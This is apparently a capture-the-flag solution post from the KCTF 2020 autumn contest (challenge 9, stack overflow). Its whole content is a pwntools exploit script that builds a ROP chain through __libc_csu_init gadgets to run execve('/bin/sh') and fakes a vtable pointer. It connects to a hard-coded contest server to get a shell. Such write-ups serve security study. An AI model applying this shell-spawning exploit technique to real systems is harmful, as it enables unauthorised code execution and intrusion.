-
-
KCTF2020秋季赛 第九题 命悬一线
-
2020-12-7 21:24 5788
-
栈溢出
from pwn import * target_file = './pwn1' context.log_level = 'warn' context.binary = target_file def get_io(): if args['REMOTE']: io = remote('121.36.145.157', 9999) elif args['IDA']: io = process([ './linux_server64' ]) else: io = process([ target_file ]) return io def test(): io = get_io() if args['IDA']: io.recvuntil('Looking for GNU DWARF file') io.recvline() ea_buf = 0x6020C0 buf = '' buf += p64(0x40185C) # pop4 buf += p64(0x4017E3) # rcx=0 buf += p64(0x40185A) # init_pop buf += p64(0) # rbx buf += p64(0) # rbp buf += p64(ea_buf + 0x68) # r12 buf += p64(ea_buf + 0x58) # r13, argv buf += p64(ea_buf + 0x50) # r14, path buf += p64(59) # r15, execve buf += p64(0x401840) # init_call buf += '/bin/sh\x00' buf += p64(ea_buf + 0x50) # argv[0] buf += p64(0) buf += p64(0x4017CC) # syscall buf = buf.ljust(0xA0, 'A') buf += p64(ea_buf - 0x18) # vtbl io.send(buf) io.interactive() return test()
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏
他的文章
KCTF2022春季赛 第三题 石像病毒
8224
KCTF2022春季赛 第二题 末日邀请
15351
KCTF2021秋季赛 第二题 迷失丛林
17879
KCTF2020秋季赛 第十题 终焉之战
8050
KCTF2020秋季赛 第九题 命悬一线
5789
看原图